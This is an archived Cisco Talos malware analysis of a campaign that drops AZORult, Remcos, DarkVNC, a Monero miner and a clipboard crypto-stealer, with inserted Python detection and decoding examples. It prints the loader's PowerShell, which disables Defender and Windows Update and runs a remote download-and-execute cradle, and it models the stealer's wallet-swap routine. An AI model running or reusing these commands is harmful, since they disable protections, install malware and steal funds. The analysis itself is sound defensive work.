{
	"id": "a195e7ac-9e4d-471d-bda7-db3b9453f074",
	"created_at": "2026-04-06T00:16:07.806556Z",
	"updated_at": "2026-04-10T03:21:48.341777Z",
	"deleted_at": null,
	"sha1_hash": "97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620",
	"title": "AZORult brings friends to the party",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1433004,
	"plain_text": "AZORult brings friends to the party\r\nBy Vanja Svajcer\r\nPublished: 2020-04-02 · Archived: 2026-04-05 14:07:36 UTC\r\nNEWS SUMMARY\r\nWe are used to ransomware attacks and big game hunting making the headlines, but there is an undercurrent of other\r\nattack types that allow attackers to monetize their efforts in a less intrusive way.\r\nHere, we discuss a multi-pronged cyber criminal attack using a number of techniques that should alert blue team\r\nmembers with appropriate monitoring capability but are not immediately obvious to end users.\r\nThese threats demonstrate several techniques of the MITRE ATT\u0026CK framework, most notably T1089 (Disabling\r\nSecurity Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1202\r\n(Indirect Command Execution), T1055 (Process Injection), T1064 (Scripting), T1053 (Scheduled Task) and T1011\r\n(Exfiltration Over Other Network Medium). These are the technique IDs in use when the post was written; ATT\u0026CK has since\r\nremapped several of them, for example T1089 to T1562.001 and T1086 to T1059.001.\r\nAttackers are constantly reinventing ways of monetizing their tools.\r\nCisco Talos recently discovered a complex campaign with several different executable payloads, each focused on\r\nproviding financial benefit for the attacker in a slightly different way. The first payload is a Monero cryptocurrency\r\nminer based on XMRigCC, and the second is a trojan that monitors the clipboard and replaces its content. There's\r\nalso a variant of the infamous AZORult information-stealing malware, a variant of the Remcos remote access tool and,\r\nfinally, the DarkVNC backdoor trojan.\r\nWhat's new?\r\nEmbedding an executable downloader in an ISO image file is a relatively new method of delivery for AZORult. It's\r\nalso unusual to see attackers using multiple methods to make money.\r\nHow did it work?\r\nThe infection chain starts with a ZIP file, which contains an ISO disk image file. When the user opens the ISO file, a\r\ndisk image containing an executable loader is mounted. 
When the loader is launched, it deobfuscates malicious code\r\nwhich downloads the first obfuscated PowerShell loader stage. That stage kickstarts the overall infection, disables security\r\ntools and the Windows Update service, and downloads and launches the payloads.\r\nSo what?\r\nDefenders need to be constantly vigilant and monitor the behavior of systems within their network. Attackers are like\r\nwater — they will attempt to find the smallest crack to achieve their goals. While organizations need to be focused on\r\nprotecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their\r\ninfrastructure.\r\nTechnical case overview\r\nIntroduction\r\nThe initial trigger for this investigation was a telemetry entry that showed a PowerShell process\r\nlaunching a download and executing a PowerShell loader.\r\nAfter the drill-down, the telemetry shows that the PowerShell downloading code was launched by an executable dropper\r\nincluded in an ISO image that's mounted within the operating system by the user. The ISO image seems to have been\r\ndownloaded compressed with ZIP, possibly encrypted with a password, which indicates it's primarily spread via email.\r\nExecutable dropper with anti-sandboxing\r\nThe dropper's functionality is rather simple, but the code contains some\r\ninteresting features. All malicious API calls are resolved dynamically by locating the PEB and traversing one of the\r\nlists of loaded modules in memory to find the module address. 
From there, the downloader goes through the export\r\ntable in order to find and return the addresses of the required functions, which are then called indirectly using one of the\r\n'call reg' instructions.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 1 of 14\n\nAll strings, including the entire command line for the downloader PowerShell code, are encrypted with a static byte key,\r\ndifferent for each string, and are decrypted during execution.\r\nCommand line for the PowerShell downloader is deobfuscated using a byte XOR key.\r\nThe most interesting feature is the function that randomly calls APIs from the list twice. First, two random\r\nnumbers from 0 to 9 are generated by a pseudo-random number generator, and those numbers, m and n, are used as\r\nparameters for the function.\r\nRandom API calls function\r\nThe function first randomly chooses and calls m and then n APIs from the list:\r\nGetCommandLineA\r\nGetTickCount\r\nGetLastError\r\nGetSystemDefaultLangID\r\nGetCurrentProcess\r\nGetProcessHeap\r\nGetEnvironmentStrings\r\nThis is likely done to confuse behavioral detectors, emulators and sandboxes that may base their detections on\r\nsequences of executed API calls.\r\nThe downloader eventually calls the MessageBox API to display a fake error message.\r\nExecutable downloader fake error message.\r\nFirst stage PowerShell loader\r\nThe first stage of the PowerShell loader is a simple command line:\r\nWhen the base64 command-line option is decoded, we reach the actual downloading code, which first disables Windows\r\nDefender real-time monitoring, stops the Windows Update service, and then downloads the next malware stage from\r\ngist.githubusercontent.com and executes it with the Invoke-Expression cmdlet (iex):\r\nSet-MpPreference -DisableRealtimeMonitoring 
$true\r\ncmd /c reg add 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d\r\ncmd /c sc stop wuauserv\r\ncmd /c sc config wuauserv start= disabled\r\niex ((New-Object\r\nSystem.Net.WebClient).DownloadString('hxxps://gist[.]githubusercontent[.]com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw\r\nThe downloaded PowerShell script is first base64-decoded and then decrypted using the ConvertTo-SecureString cmdlet. The\r\nresult is a PowerShell script with several layers of obfuscation, the product of applying Invoke-Obfuscation\r\nto the original code. Once deobfuscated, we can see the functionality of the PowerShell loader.\r\nPowerShell loader\r\nThe PowerShell script downloaded and executed by the executable downloader is responsible for installing the\r\npayloads and ensuring that they stay persistent after the user logs out. All the payloads are downloaded from external\r\nsites.\r\nThe loader first sets the PowerShell preferences so that warning and error messages are not displayed and the\r\nscript continues executing if an error is encountered:\r\n$WarningPreference = \"SilentlyContinue\"\r\n$erroractionpreference = \"SilentlyContinue\"\r\nThe execution continues with a check of the current privileges. The loader behaves differently if the user has administrative\r\nprivileges.\r\nIf the user does not have administrative privileges, the loader creates the registry value HKCU\\Software\\Kumi and stores a\r\nbase64-encoded string that contains code to download and execute a variant of the XMRigCC cryptocurrency miner. 
It then\r\ncreates a scheduled task with the name OneDrive SyncTask to execute hourly and launch the miner which is read from the\r\npreviously created registry entry.\r\nIf the user belongs to the administrators' group, the loader will first create exclusion folders for the Windows Defender so\r\nthat certain folders are not scanned and then attempt to disable various Defender's user notifications so that the user is not\r\nnotified if any of the components in the attack are detected. Malwarebytes anti-malware service will also be stopped and\r\ndeleted if it exists on the computer.\r\nFinally, if the loader has administrative privileges it will attempt to create three services WinDefends, thundersec and\r\nWindowsNetworkSVC, and create three scheduled tasks to launch those services on an hourly basis. The task names are\r\n\\Microsoft\\Windows\\Shell\\updshell, \\Microsoft\\Windows\\Autochk\\SystemProxy and\r\n\\Microsoft\\Windows\\MobilePC\\DetectPC.\r\nAt the time of writing, the first URL contained a loader for either a variant of Remcos remote access tool or a variant of\r\nDarkVNC remote access trojan. If the user has administrative privileges, the loader launches Remcos. Otherwise, it launches\r\nDarkVNC.\r\nThe loader then downloads and launches a clipboard modification trojan from githubusercontent.com with the filename\r\nclp.exe in the user's temporary folder. This cryptocurrency stealer is described later.\r\nRegardless of the permissions, the loader will create a registry value HKCU\\Software\\cr\\d and store the code to download\r\nand launch one of the above backdoor trojans and creates a scheduled task \"Update Shell\" to run every five hours. 
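Hunting for the loader's footprint in process-creation telemetry, as an added example (my code, not code from the post or from Talos). The rules below encode the behaviours the post describes: Defender tampering, stopping wuauserv, the iex/DownloadString cradle hidden behind an encoded command, the task, service and registry names the loaders create, the java.exe drop path and the mshta-launched HTML applications described under the XMRigCC payload. The telemetry lines are constructed for the example, the detection names are my own, and the exact syntax the loaders use to register tasks and services is not shown in the post, so the schtasks and sc lines are assumptions.

```python
import base64
import re

# Names the post attributes to the loaders: scheduled-task leaf names, service names, the
# HKCU keys used to stage code and the miner drop path. Matching is case-insensitive on the
# leaf name, so a \\Microsoft\\Windows\\... task folder prefix does not matter.
KNOWN_TASKS = {
    'onedrive synctask', 'onedrive sync', 'update shell', 'updshell', 'systemproxy', 'detectpc',
    'googlechromeupdatetask', 'windowsshellupdate', 'winshell', 'updatedevicetask', 'upnphost',
    'upnpclient task', 'smb task', 'edp app lock task', 'edp app update cache',
    'optimization .net', 'optimization',
}
KNOWN_TASK_PREFIXES = ('optimize start menu cache files', '.net framework cache optimization')
KNOWN_SERVICES = {'windefends', 'thundersec', 'windowsnetworksvc',
                  'cli_optimization_v2.0.55727_64', 'cli_optimization_v2.0.55727_32'}
KNOWN_PAYLOAD_PATH = 'programdata\\oracle\\java\\java.exe'
QUOTES = chr(34) + chr(39)  # double and single quote, stripped from extracted names

ENC_ARG = re.compile('(?:-e|-ec|-enc|-encodedcommand)\\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
REG_ADD = re.compile('\\breg(?:\\.exe)?\\s+add\\b')
SC_WUAU = re.compile('\\bsc(?:\\.exe)?\\s+(?:stop|config)\\s+wuauserv\\b')
TASK_NAME = re.compile('/tn\\s+(.+?)(?:\\s+/|$)')
SERVICE_NAME = re.compile('(?:\\bsc(?:\\.exe)?\\s+create|new-service(?:\\s+-name)?)\\s+(\\S+)')
STAGED_KEY = re.compile('software\\\\(?:kumi|cr)(?:\\W|$)')


def decode_encoded_command(cmdline):
    '''Return the UTF-16LE script behind a PowerShell -EncodedCommand argument, or an empty
    string when there is none or it does not decode cleanly.'''
    m = ENC_ARG.search(cmdline)
    if not m:
        return ''
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return ''


def leaf(name):
    '''Last path component of a task name such as \\Microsoft\\Windows\\Shell\\updshell.'''
    return name.strip(QUOTES).split('\\')[-1].strip().lower()


def classify(parent, image, cmdline):
    '''Return the ordered list of detection names that fire for one process-creation event.'''
    # Match on the visible command line plus the decoded script, minus the base64 blob itself.
    low = (ENC_ARG.sub(' ', cmdline) + ' ' + decode_encoded_command(cmdline)).lower()
    hits = []
    if (('set-mppreference' in low and '-disable' in low)
            or ('add-mppreference' in low and '-exclusion' in low)
            or (REG_ADD.search(low) and 'disableantispyware' in low)):
        hits.append('defender_tamper')
    if SC_WUAU.search(low):
        hits.append('update_service_tamper')
    if 'downloadstring' in low and ('iex' in low or 'invoke-expression' in low):
        hits.append('download_cradle')
    m = TASK_NAME.search(low)
    if m and (leaf(m.group(1)) in KNOWN_TASKS or leaf(m.group(1)).startswith(KNOWN_TASK_PREFIXES)):
        hits.append('known_task_name')
    m = SERVICE_NAME.search(low)
    if m and m.group(1).strip(QUOTES) in KNOWN_SERVICES:
        hits.append('known_service_name')
    if KNOWN_PAYLOAD_PATH in low:
        hits.append('known_payload_path')
    if STAGED_KEY.search(low):
        hits.append('staged_code_in_registry')
    if image.lower() == 'mshta.exe' and 'http' in low and '.hta' in low:
        hits.append('mshta_remote_hta')
        if parent.lower() == 'services.exe':
            hits.append('hta_launched_by_service')
    return hits


def scan(events):
    '''Apply classify() to (parent, image, cmdline) tuples and keep the events that fired.'''
    out = []
    for parent, image, cmdline in events:
        hits = classify(parent, image, cmdline)
        if hits:
            out.append((image, hits))
    return out


# Constructed sample telemetry in the shape the post describes; not telemetry from the post.
STAGE1 = ('Set-MpPreference -DisableRealtimeMonitoring $true; '
          'iex ((New-Object Net.WebClient).DownloadString($u))')
ENCODED_STAGE1 = base64.b64encode(STAGE1.encode('utf-16-le')).decode('ascii')
SAMPLE_EVENTS = [
    ('explorer.exe', 'powershell.exe', 'powershell -w hidden -enc ' + ENCODED_STAGE1),
    ('powershell.exe', 'cmd.exe', 'cmd /c sc stop wuauserv'),
    ('powershell.exe', 'cmd.exe', 'cmd /c sc config wuauserv start= disabled'),
    ('powershell.exe', 'cmd.exe', 'cmd /c reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender '
     '/v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ('powershell.exe', 'schtasks.exe',
     'schtasks /create /tn \\Microsoft\\Windows\\Shell\\updshell /sc hourly /tr powershell.exe'),
    ('powershell.exe', 'sc.exe', 'sc create WinDefends binPath= C:\\ProgramData\\Oracle\\Java\\java.exe'),
    ('taskeng.exe', 'powershell.exe',
     'powershell -w hidden -c $v=(Get-ItemProperty HKCU:\\Software\\cr).d; iex($v)'),
    ('services.exe', 'mshta.exe', 'mshta.exe http://example.invalid/win/checking.hta'),
    ('explorer.exe', 'notepad.exe', 'notepad.exe C:\\Users\\alice\\notes.txt'),
]

if __name__ == '__main__':
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, hits)
```

A real deployment would read Sysmon event 1 or EDR process events instead of the constructed list. Decoding the -EncodedCommand argument before matching is the step that matters: the first stage's Defender and Windows Update tampering is only visible in the decoded UTF-16LE script, not in the raw command line, and the base64 blob is removed before matching so that it cannot produce chance hits.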
The task\r\nretrieves the value stored as a base64-encoded string in the registry and downloads code from the URL\r\nhxxps://raw[.]githubusercontent[.]com/mysslacc/thd/master/base.\r\nFinally, the loader uses a process injector, RunPE, to inject a variant of the AZORult information-stealing trojan into the\r\nnotepad.exe process.\r\nProcess tree of the PowerShell loader as seen in Cisco Threat Grid\r\nPayloads\r\nXMRigCC cryptominer\r\nPerhaps the least interesting payload installed by the loader, XMRigCC is a variant of an open-source miner that can\r\nbe controlled through a command and control (C2) console. XMRigCC has its own loader, which is called by\r\ndecoding and executing the content of the variable $kumi of the main loader.\r\nThis particular payload is not configured to connect to a command and control server but chooses its pool host from the\r\nlist below. All connections are conducted over port 443, possibly to avoid easy detection when other ports are\r\nused.\r\nThe list of hosts from the configuration is:\r\neu[.]minerpool[.]pw\r\n185[.]10[.]68[.]220\r\nrig[.]zxcvb[.]pw\r\nrig[.]myrms[.]pw\r\nback123[.]brasilia[.]me\r\nrs[.]fym5gserobhh[.]pw\r\nCisco Umbrella showing a spike of DNS requests for eu[.]minerpool[.]pw.\r\nThe cryptominer installs itself depending on the loader's process privileges. If the PowerShell loader has administrative\r\nprivileges, it will attempt to disable Windows Defender, Malwarebytes, Sophos and HitmanPro if they are installed. The\r\nloader then downloads the payload from the IP address 195.123.234.33 and copies it to\r\nC:\\ProgramData\\Oracle\\Java\\java.exe.\r\nOne of the interesting features is the download of a third-party driver, WinSys0 from the OpenLibSys utility, which allows\r\nthe client application to read and write physical memory. 
However, it seems that the driver is not used and there is no\r\nevidence of the driver being loaded into memory.\r\nThe loader creates the following scheduled tasks:\r\n\\Microsoft\\Windows\\Bluetooth\\UpdateDeviceTask\r\n\\Microsoft\\Windows\\Shell\\WindowsShellUpdate\r\n\\Microsoft\\Windows\\Shell\\WinShell\r\n\\Microsoft\\Windows\\UPnP\\UPnPHost\r\n\\Microsoft\\Windows\\UPnP\\UPnPClient Task\r\n\\Microsoft\\Windows\\SMB\\SMB Task\r\n\\Microsoft\\Windows\\EDP\\EDP App Lock Task\r\n\\Microsoft\\Windows\\EDP\\EDP App Update Cache\r\n\\Microsoft\\Windows\\MobilePC\\DetectPC\r\n\\Microsoft\\Windows\\.NET Framework\\.NET Framework Cache Optimization\r\n\\Microsoft\\Windows\\.NET Framework\\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-\r\n433529325-2142214968-1138  \r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 6 of 14\n\nand creates one of the two services, depending on the bitness of the operating system:\r\ncli_optimization_v2.0.55727_64\r\ncli_optimization_v2.0.55727_32\r\nThe services simply call mshta.exe to download an HTML application that downloads and runs the same cryptominer\r\nloader.\r\nThe loader downloads and runs a PowerShell script del.ps1 that disables Windows event logging and attempts to terminate\r\nsystem utilities such as Process Explorer, Task Manager, Process Monitor and Daphne Task Manager.\r\nThe non-administrative branch of the cryptominer loader is quite similar and takes into account that changes are made to\r\nobjects that can be modified by the current user.\r\nHere is the list of new scheduled task names created by the lower-privilege branch of the loader:\r\nOneDrive Sync\r\nOneDrive SyncTask\r\nOptimization .NET\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138\r\nOptimize Start Menu 
Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1447\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037\r\n\\Microsoft\\Windows\\Optimization\r\nClipboard cryptocurrency stealer\r\nThe next payload is a cryptocurrency clipboard-stealing trojan. The main loader downloads it from\r\nhxxps://gist[.]githubusercontent[.]com/mysslacc/ee6d2b99f8e3a3475b7a36d9e96d1c18/raw/1a82b38931d8421406f53eb8fc4c771127b\r\nsaves it in the user's temporary folder as \"clp.exe,\" which is then launched.\r\nThe trojan copies itself into the file updip.exe in the user's ProgramData\\updip folder and creates a link file udpid.lnk in the\r\nuser's Startup folder so that the malware runs every time the user logs into the system. The link file is created by a\r\nPowerShell process that is called directly by the trojan with a long command line containing a base64-encoded script.\r\nThe persistence is also ensured by creating a new scheduled task — GoogleChromeUpdateTask — which runs the trojan\r\nevery three hours.\r\nApart from the installation and persistence, the main functionality of the trojan is contained in a simple loop that monitors\r\nthe clipboard content every half a second. The trojan contains an obfuscated list of regular expressions used to match the\r\nclipboard content. The strings are stored either as a data buffer or as constants assigned to contiguous memory locations.\r\nOnce a buffer is created, its contents are XORd with the byte key 0x2e.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 7 of 14\n\nDeobfuscating a regex to match Bitcoin addresses.\r\nHere, we see that the trojan initialises a memory buffer with the value\r\n70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53, which after XOR, reveals a regular\r\nexpression #^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$, apparently used to match Bitcoin addresses. 
If a Bitcoin address is\r\nmatched, the malware calls the routine to modify the clipboard, presumably to redirect any transactions to the address owned\r\nby the attacker.\r\nDecrypting the attacker's Bitcoin wallet address to replace the clipboard data.\r\nBased on the arguments of the function, the trojan will choose one of the attacker-owned cryptocurrency addresses and\r\nmodify the clipboard to contain the deobfuscated data. Once again, we see here that the buffer is filled with the value\r\n1d6d5d4a17745f1a5c1f184a787f5b7c6b5d1b1c571b4b646849776b5f7f446f561f, which becomes the address\r\n3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 after deobfuscation. We can easily see that this address earned just under\r\nsix Bitcoins over time.\r\nThe number of transactions and the amount earned by the clipboard stealer in Bitcoins.\r\nThe trojan targets Bitcoin, Litecoin, Ethereum, Dash, Monero and Doge-Coin using the following regular expressions:\r\n^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ - Bitcoin\r\n^0x[a-fA-F0-9]{40}$ - Ethereum\r\n^[LM][A-z][1-9A.z]{32}$ - Litecoin\r\n^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$ - Doge-Coin\r\n^DX[a-z][1-9A-z]{32}$ - Dash - incorrect regular expression: it requires a leading DX, whereas Dash addresses, including the attacker's own Dash wallet listed under IoCs, begin with a single X\r\n^[0-9][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}$ - Monero\r\nThe next three payloads are all delivered using a PowerShell technique that downloads an obfuscated binary loader and a\r\nbyte array in text form and transforms them into actual binaries. The download is performed by using reflection to load the\r\nVisualBasic assembly and then calling into it through the VisualBasic Interaction class. The script first\r\ndecompresses and loads a binary loader, RunPE, which is then used to load a byte array containing the binary payload into\r\nthe process space of a newly created process: explorer.exe, control.exe or notepad.exe for Remcos, DarkVNC and AZORult\r\nrespectively. 
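Decoding the two buffers quoted above and modelling the stealer's match-and-replace loop, as an added example (my code, not the stealer's or Talos's): xor_decode() undoes the single-byte XOR with 0x2e, and the 32 quoted bytes of the first buffer decode to the Bitcoin pattern without its trailing $ anchor, which is not among the bytes shown. The regular expressions and attacker wallets are the ones the post lists; the victim addresses fed to swap_clipboard() are constructed for the example and the function names are my own.

```python
import re

# One-byte XOR key the clipboard stealer applies to its string buffers (from the post).
XOR_KEY = 0x2e

# Hex buffers quoted in the post. The first decodes to the Bitcoin regex (without the trailing
# $ anchor, which is not among the 32 bytes quoted), the second to the attacker's Bitcoin address.
BTC_REGEX_BUF = '70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53'
BTC_ADDR_BUF = '1d6d5d4a17745f1a5c1f184a787f5b7c6b5d1b1c571b4b646849776b5f7f446f561f'


def xor_decode(hex_buf, key=XOR_KEY):
    '''Undo the single-byte XOR: every byte of the buffer was XORed with the same key.'''
    return bytes(b ^ key for b in bytes.fromhex(hex_buf)).decode('ascii')


# The regular expressions exactly as the post lists them, each paired with the attacker wallet
# the post names for that coin under IoCs. The Dash pattern is kept as the malware has it.
TARGETS = [
    ('Bitcoin', '^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$', '3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1'),
    ('Ethereum', '^0x[a-fA-F0-9]{40}$', '0x51664e573049ab1ddbc2dc34f5b4fc290151cdb4'),
    ('Litecoin', '^[LM][A-z][1-9A.z]{32}$', 'LS2GBEJEzgDy14hVHFp4JJzjKoiMgkbZAY'),
    ('Dogecoin', '^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$', 'D6yFAuCDoMkCftyXTWY8m267PzxeoaiMX7'),
    ('Dash', '^DX[a-z][1-9A-z]{32}$', 'XrchZULVyJPAFro13627cyKdfb6ojerRwv'),
    ('Monero', '^[0-9][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}$',
     '855vLkzTFwr82TrfPKLH6w3UB19RGdHDsGY1etmdyZjZChbhyghtiK66ZVXoVayJXVNydca7KZqE53Dn2Hsk8WdKDmjq3bu'),
]
COMPILED = [(coin, re.compile(pattern), wallet) for coin, pattern, wallet in TARGETS]


def match_wallet(clipboard_text):
    '''Return the coin whose pattern matches the clipboard text, or None.'''
    for coin, regex, _wallet in COMPILED:
        if regex.match(clipboard_text):
            return coin
    return None


def swap_clipboard(clipboard_text):
    '''Model one iteration of the stealer loop: a recognised address is replaced by the
    attacker's wallet for that coin; anything else is left untouched.'''
    for _coin, regex, wallet in COMPILED:
        if regex.match(clipboard_text):
            return wallet
    return clipboard_text


def self_test_patterns():
    '''Which of the attacker's own wallets do the malware's patterns recognise? A False entry
    means that coin can never be hijacked by this build.'''
    return {coin: bool(regex.match(wallet)) for coin, regex, wallet in COMPILED}


if __name__ == '__main__':
    print(xor_decode(BTC_REGEX_BUF))
    print(xor_decode(BTC_ADDR_BUF))
    # Constructed victim address in Bitcoin P2PKH shape (not a real wallet).
    print(swap_clipboard('1VictimWaLLetSamp1eAddrXYZ789abcde'))
    print(self_test_patterns())
```

self_test_patterns() reports False for Dash, which is the bug the post calls out. It also reports False for the Litecoin pattern as printed, because [1-9A.z] admits only digits, A, a literal dot and z after the second character, so either the malware cannot hijack Litecoin addresses or the post's rendering of that pattern lost a hyphen; the page does not say which.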
All of the payloads are common so we will only briefly describe them. A full analysis is outside of the scope of\r\nthis post.\r\nDownloading and loading RunPE that loads a DarkVNC payload from a byte array\r\nAZORult\r\nAZORult is an information-stealing bot written in Delphi which connects to a command and control server for so-called \"work\", which comes in a format of a JSON configuration. The communication with the C2 server is\r\nconducted using HTTP with the payload encrypted with a default XOR key 0x0d, 0x0a, 0xc8.\r\nOnce installed, the bot contacts the server using a POST request. Depending on the version of the bot the server can send a\r\nJSON configuration or a set of DLLs to help with stealing information as well as a set of new strings that should be used\r\nwhen matching targeted content for exfiltration.\r\nAZORult may attempt to execute one or more of:\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 9 of 14\n\nSteal stored browser passwords\r\nSteal cryptocurrency wallets\r\nSteal browser history\r\nSteal website cookies\r\nSteal email credentials\r\nSteal Telegram credentials\r\nSteal Steam credentials\r\nSteal Skype credentials and message history\r\nTake victim machine screenshots\r\nExecute custom commands\r\nRemcos\r\nRemcos is a RAT that is offered for sale by a company called Breaking Security. While the company says it will only\r\nsell the software for legitimate uses as described in comments in response to the article here and will revoke the\r\nlicenses for users not following their EULA, the sale of the RAT gives attackers everything they need to establish and\r\nrun a potentially illegal botnet.\r\nRemcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques\r\nthat make it difficult for the typical user to detect the existence of Remcos. 
It is written in C++ and is relatively small for the\r\nrich functionality it contains.\r\nThe Remcos payload included by the PowerShell loader is the latest version 2.5.0. Talos has created a decoder that allows\r\nsimple extraction of Remcos configurations. Cisco Umbrella shows an increase in requests for the default C2 domain\r\ndfgdgertdvdf.xyz of the sample around the time we found the initial PowerShell loader.\r\nDNS activity for the default C2 domain of the Remcos payload.\r\nDarkVNC\r\nIf the user does not have administrative privileges the loader will attempt to load a variant of the DarkVNC trojan,\r\nwhich allows the attacker to remotely access the infected system using the VNC protocol. The C2 server IP address\r\nfor this sample, 52.15.61.57, is shared with one of the C2 domains specified in the Remcos sample configuration —\r\ndfgdgertdvdf.online.\r\nThis IP address has been actively used in several campaigns from at least mid-December 2019.\r\nIndeed, we can see that the DNS activity for this domain corresponds with the activity for the default Remcos C2. DarkVNC\r\nattempts to connect to the C2 server using the TCP port 8080, likely to be less suspicious as this is one of the default ports\r\nfor connections to HTTP proxies.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 10 of 14\n\nDNS activity for the default C2 domain of the DarkVNC payload.\r\nDarkVNC launches a new svchost.exe process and depending on the bitness of the operating system injects a version of a\r\n32- or 64-bit DLL into the svchost.exe process space. The loaded library is extracted from the dropper and it contains remote\r\naccess functionality.\r\nConclusion\r\nIn this post, we covered an attack that comes from an actor with a low to medium level of technical ability but quite a\r\nclear idea on how to achieve their financial goals. 
For that, they decided to employ a combination of several payloads,\r\nranging from a cryptocurrency miner to the well-known information stealer AZORult, the remote access tools Remcos and\r\nDarkVNC, and a clipboard modification trojan.\r\nLoaders and payloads used in the AZORult, Remcos and co. attack.\r\nIt is worth remembering that even in special times, for cyber criminals it is just business as usual. Furthermore, as users are\r\nworried by the SARS-CoV-2 pandemic and are increasingly working from home, attackers will take advantage and\r\ncontinue to conduct their attacks with a higher probability of remaining unnoticed.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nExploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites\r\nand detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System\r\n(NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether\r\nusers are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nIoCs\r\nOSQuery\r\nCisco AMP users can use 
Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this\r\nspecific threat. For specific OSqueries on this threat, click below:\r\nMalware AZORult Registry\r\nSHA256\r\nPE Payloads\r\nbf2f3f1db2724b10e4a561dec10f423d99700fec61acf0adcbb70e23e4908535 - Remcos payload\r\n42525551155fd6f242a62e3202fa3ce8f514a0f9dbe93dff68dcd46c99eaab06 - AZORult payload\r\n2014c4ca543f1cc946f3b72e8b953f6e99fbd3660edb4b66e2658b8428c0866d - 64 bit XMRigCC\r\nbde46cf05034ef3ef392fd36023dff8f1081cfca6f427f6c4894777c090dad81 - DarkVNC main\r\n1c08cf3dcf465a4a90850cd256d29d681c7f618ff7ec94d1d43529ee679f62f3 - DarkVNC 64 bit DLL\r\na02d761cbc0304d1487386f5662a675df3cc6c3ed199e8ed36f738e9843ccc1b - RunPE loader for AZORult, Remcos and\r\nDarkVNC\r\n2f1668cce3c8778850e2528496a0cc473edc3f060a1a79b2fe6a9404a5689eea - Clipboard Crypto currency stealer unpacked\r\n9e3a6584c77b67e03965f2ae242009a4c69607ea7b472bec2cba9e6ba9e41352 - 32 bit XMRigCC\r\n29695ca6f5a79a99e5d1159de7c4eb572eb7b442148c98c9b24bdfdbeb89ffc0 - 32 DarkVNC dll\r\naca587dc233dd67f5f265bfda00aec2d4196fde236edfe52ad2e0969932564ed - Clipboard Crypto currency stealer\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 12 of 14\n\nDroppers\r\n598c61da8e0932b910ce686a4ab2fae83fa3f1b2a4292accad33ca91aa9bd256 - Main Executable loader\r\nd88ed1679d3741af98e5d2a868e2dcb1fa6fbd7b56b2d479cfa8a33d8c4d8e0b - ISO image distributeted in a ZIP file\r\nHTML apps connected with XMRigCC\r\n936fbe1503e8e0bdc44e4243c6b498620bb3fefdcbd8b2ee85316df3312c4114\r\n57f1b71064d8a0dfa677f034914e70ee21e495eaab37323a066fd64c6770ab6c\r\nf46a1556004f1da4943fb671e850584448a9521b86ba95c7e6a1564881c48349\r\nb7c545ced7d42410c3865faee3a47617f8e1b77a2365fc35cd2661e571acdc06\r\nPowerShell scripts\r\n2548072a77742e2d5b5ee1d6e9e1ff9d67e02e4c96350e05a68e31213193b35a\r\n14e956f0d9a91c916cf4ea8d1d581b812c54ac95709a49e2368bd22e1f0a32ca - XMRigCC 
